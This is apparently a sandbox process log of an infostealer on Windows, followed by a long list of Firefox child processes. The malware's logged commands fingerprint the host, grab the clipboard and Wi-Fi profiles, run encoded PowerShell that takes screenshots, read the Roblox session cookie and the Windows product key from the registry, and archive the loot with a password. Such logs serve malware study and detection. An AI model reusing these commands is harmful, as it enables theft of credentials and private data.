AAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c5hhtixo\c5hhtixo.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES48B1.tmp" "c:\Users\Admin\AppData\Local\Temp\c5hhtixo\CSCD6BDBEF5704E4AB0A8A12B1D19DBE296.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50922\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\16ZAa.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI50922\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI50922\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\16ZAa.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.0.1548542661\2139289314" -parentBuildID 20230214051806 -prefsHandle 1744 -prefMapHandle 1736 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c8c4450c-f290-4eb3-a480-ab5f6ba382d5} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 1836 2feca6f1858 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.1.615803478\657450740" -parentBuildID 20230214051806 -prefsHandle 2392 -prefMapHandle 2380 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b67ab8a7-2fac-49df-8dae-1f0fde550550} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 2404 2febe989958 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.2.1644332059\1435831737" -childID 1 -isForBrowser -prefsHandle 2940 -prefMapHandle 2888 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bfed46cf-57bb-4606-a776-fa4d12b76d70} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 2928 2fece417758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.3.1230308447\1780318342" -childID 2 -isForBrowser -prefsHandle 3668 -prefMapHandle 3664 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d76516e-e026-47c4-be18-94165c9e9f14} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 3680 2fed019e158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.4.1356212022\1164133433" -childID 3 -isForBrowser -prefsHandle 5168 -prefMapHandle 5164 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97da2b5c-4347-42bd-86f1-507ad3b160be} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5180 2fed233fe58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.5.1394154044\1857127210" -childID 4 -isForBrowser -prefsHandle 5312 -prefMapHandle 5316 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b07befdf-24f4-4534-b741-b5acbd6c7c44} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5304 2fed2e70a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.6.827780039\676138984" -childID 5 -isForBrowser -prefsHandle 5508 -prefMapHandle 5512 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9448d54-d316-4272-918f-3172d1a0cbac} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5496 2fed2e71c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.7.191482268\258674567" -childID 6 -isForBrowser -prefsHandle 1536 -prefMapHandle 2636 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95b72987-d9d9-418a-8620-e8eb7046e258} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5792 2fed407f558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.8.1684474144\338674860" -parentBuildID 20230214051806 -prefsHandle 6064 -prefMapHandle 1564 -prefsLen 27697 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a248d000-0d31-40c3-8ec7-ee6170945729} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5988 2fed02d7058 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.9.1102547069\110656528" -childID 7 -isForBrowser -prefsHandle 10040 -prefMapHandle 10044 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54dbb319-ef2d-4289-9737-a85292bc8889} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10080 2fed4efa258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.10.1677778235\723996722" -childID 8 -isForBrowser -prefsHandle 9800 -prefMapHandle 9768 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {69969fe8-05c9-4a79-8d78-bb3414f02c73} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9808 2fed407fe58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.11.1775630829\2101987883" -childID 9 -isForBrowser -prefsHandle 9580 -prefMapHandle 9568 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75b43ce5-ac76-432e-b0db-4f69a799903b} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9588 2fed5549858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.12.227401379\727617421" -childID 10 -isForBrowser -prefsHandle 9344 -prefMapHandle 9592 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26127f2f-2a49-436b-b398-eda6ad763ad3} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9740 2fed554a458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.13.1290499912\583534012" -childID 11 -isForBrowser -prefsHandle 9100 -prefMapHandle 9168 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9fe2a69-2ef6-4496-a760-a8f00c102847} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9092 2fed554cb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.14.642554077\2051119939" -childID 12 -isForBrowser -prefsHandle 8744 -prefMapHandle 8748 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2417fe8-6063-45bf-b79a-4183975bd621} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9504 2fed5c6a158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.15.920982380\996574547" -childID 13 -isForBrowser -prefsHandle 8512 -prefMapHandle 8516 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5859a7ee-39e0-4356-957f-7c77f031626d} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 8552 2fed614b258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.16.689338010\40834246" -childID 14 -isForBrowser -prefsHandle 8496 -prefMapHandle 8492 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0011d17-89d7-4eaa-b403-d7dc6966b1aa} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 8480 2fed484d958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.17.682845685\925525864" -childID 15 -isForBrowser -prefsHandle 8572 -prefMapHandle 8504 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fc82461-87e6-4268-8e9c-438c43b7a3fe} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9568 2fed484be58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.18.1382773691\1985378191" -childID 16 -isForBrowser -prefsHandle 8104 -prefMapHandle 8108 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {56f9be48-b968-4dbf-8294-26f5830de36c} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 8096 2fed666d658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.19.1736049878\1858377365" -childID 17 -isForBrowser -prefsHandle 7876 -prefMapHandle 7872 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2c4455c-ee49-4d66-b744-824d5905de58} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 8076 2fed68aaa58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.20.24613621\1794545916" -childID 18 -isForBrowser -prefsHandle 8160 -prefMapHandle 7848 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {079944ca-a273-409b-90e7-4236f81f7904} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7840 2fed68ab958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.21.357398867\1418662110" -childID 19 -isForBrowser -prefsHandle 7536 -prefMapHandle 7540 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf40c48f-be26-4f19-8608-6ef7156f7650} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7644 2fed6abba58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.22.718358192\1718980534" -childID 20 -isForBrowser -prefsHandle 7440 -prefMapHandle 7528 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed80a11e-9f11-4f37-8555-0dff35d1fe47} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7872 2fed6abcc58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.23.1574448988\1929654738" -childID 21 -isForBrowser -prefsHandle 7276 -prefMapHandle 7776 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81afc695-c950-4080-8563-02c7ef4886c7} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7772 2fed71bde58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.24.863064804\1537022992" -parentBuildID 20230214051806 -sandboxingKind 1 -prefsHandle 8856 -prefMapHandle 6888 -prefsLen 27776 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9aa5918f-fc46-46d0-821e-e7879fca8ff6} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 6868 2fed5d8d558 utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.25.439946013\530452240" -childID 22 -isForBrowser -prefsHandle 6812 -prefMapHandle 6816 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7017438d-6f4b-4233-8cc2-934cb2a2ac34} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7192 2fed58a8658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.26.2065785418\1000208025" -childID 23 -isForBrowser -prefsHandle 6624 -prefMapHandle 6620 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81b3afdf-9b5f-4b62-98be-33d418198abd} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 6632 2fed5d8fc58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.27.1308398905\1705913018" -childID 24 -isForBrowser -prefsHandle 6524 -prefMapHandle 6520 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d34bed5b-3989-40a8-b365-6d1b0be5df51} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 6536 2fed601c658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.28.1385589469\12902816" -childID 25 -isForBrowser -prefsHandle 6272 -prefMapHandle 6276 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f075c15-bd15-4cda-b19f-49ca9982c4cb} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 6264 2febe940358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.29.923430430\59486449" -childID 26 -isForBrowser -prefsHandle 4944 -prefMapHandle 10376 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {826d0806-87a2-4f78-8774-8a3bcdc1eea3} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10404 2fed3d62358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.30.687212624\1877107049" -childID 27 -isForBrowser -prefsHandle 10152 -prefMapHandle 10632 -prefsLen 31301 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {33b24705-447b-4ee5-99fb-5cd8e6eb6140} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10572 2feddb13658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
